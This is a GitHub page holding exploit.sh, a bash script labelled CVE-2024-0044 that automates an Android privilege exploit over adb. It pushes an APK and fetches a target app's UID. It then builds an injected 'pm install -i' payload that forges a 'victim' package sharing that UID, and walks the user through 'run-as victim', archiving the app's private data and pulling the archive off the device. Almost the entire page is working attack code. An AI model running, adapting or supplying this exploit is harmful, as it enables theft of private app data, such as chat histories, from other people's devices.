-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.sh
144 lines (123 loc) · 4.48 KB
/
exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/bin/bash
# Define colors
GREEN="\033[32m"
CYAN="\033[36m"
BOLD="\033[1m"
RESET="\033[0m"
CHECK_MARK="\u2714"
ERROR_MARK="\u2716"
# Function to display banner
display_banner() {
echo -e "${CYAN}${BOLD}"
echo "##########################################"
echo "# CVE-2024-0044 #"
echo "# > Nahid0x1 #"
echo "##########################################"
echo -e "${RESET}"
}
# Function to push the APK
push_apk() {
apk_path=$1
if [[ ! -f "$apk_path" ]]; then
echo "Error: APK file '$apk_path' does not exist."
return 1
fi
adb push "$apk_path" /data/local/tmp/
if [[ $? -ne 0 ]]; then
echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: Failed to push APK."
return 1
fi
echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Successfully pushed '${GREEN}${apk_path}${CYAN}' to '${GREEN}/data/local/tmp/$(basename "$apk_path")${CYAN}'"
return 0
}
# Function to get the app UID
get_app_uid() {
package_name=$1
uid=$(adb shell "pm list packages -U | grep ${package_name}" | awk -F'uid:' '{print $2}')
if [[ -z "$uid" ]]; then
echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error: Could not find UID for package '${package_name}'"
return 1
fi
echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Got the target UID for ${GREEN}${package_name}${CYAN}: ${GREEN}${uid}${CYAN}"
echo "$uid"
return 0
}
# Function to generate the payload
generate_payload() {
uid=$1
apk_filename=$2
payload="PAYLOAD=\"@null\nvictim ${uid} 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null\"\npm install -i \"\$PAYLOAD\" /data/local/tmp/${apk_filename}"
echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Payload generated and saved to: ${GREEN}payload.txt${CYAN}"
echo -e "${GREEN}${payload}${GREEN}"
echo "$payload" > payload.txt
prompt_user_for_next_action
}
# Function to prompt user for next action
prompt_user_for_next_action() {
while true; do
read -p "Copy the above command in adb shell. After you finish, type 'y' to continue or 'n' to quit: " user_input
case $user_input in
[Yy]* ) run_adb_commands; break;;
[Nn]* ) echo "Exiting."; exit;;
* ) echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Invalid input. Please type 'y' to continue or 'n' to quit.";;
esac
done
}
# Function to prompt user to run as victim
prompt_user_to_run_as() {
while true; do
echo -e "${GREEN}run-as victim\ntar -cf /data/local/tmp/wa/wa.tar ${package_name}${CYAN}"
read -p "Copy the above commands in adb shell. After you finish, type 'y' to continue or 'n' to quit: " user_input
case $user_input in
[Yy]* ) pull_with_progress "wa.tar"; break;;
[Nn]* ) echo "Exiting."; exit;;
* ) echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Invalid input. Please type 'y' to continue or 'n' to quit.";;
esac
done
}
# Function to pull the file with progress
pull_with_progress() {
filename=$1
device_path="/data/local/tmp/wa/wa.tar"
filesize=$(adb shell "du -s $device_path" | awk '{print $1}')
echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Downloading file: ${GREEN}${filename}${CYAN} (size: ${GREEN}${filesize}${CYAN} bytes)"
adb shell "cat $device_path" > "$filename"
echo -e "\n${CYAN}${BOLD}[${CHECK_MARK}] Download complete: ${GREEN}${filename}${CYAN}"
}
# Function to run adb commands
run_adb_commands() {
commands=("mkdir /data/local/tmp/wa/" "touch /data/local/tmp/wa/wa.tar" "chmod -R 0777 /data/local/tmp/wa/")
for command in "${commands[@]}"; do
adb shell "$command"
if [[ $? -ne 0 ]]; then
echo -e "${CYAN}${BOLD}[${ERROR_MARK}] Error executing command: $command"
else
echo -e "${CYAN}${BOLD}[${CHECK_MARK}] Command executed successfully: $command"
fi
done
prompt_user_to_run_as
}
# Main script execution
display_banner
package_name=""
apk_path=""
while getopts "P:A:" opt; do
case $opt in
P) package_name=$OPTARG ;;
A) apk_path=$OPTARG ;;
*) echo "Invalid option"; exit 1 ;;
esac
done
if [[ -z "$package_name" || -z "$apk_path" ]]; then
echo "Usage: $0 -P <package_name> -A <apk_file_path>"
exit 1
fi
push_apk "$apk_path" && {
apk_filename=$(basename "$apk_path")
uid=$(get_app_uid "$package_name")
if [[ $? -eq 0 ]]; then
generate_payload "$uid" "$apk_filename"
else
echo "Failed to retrieve UID for package '$package_name'."
fi
}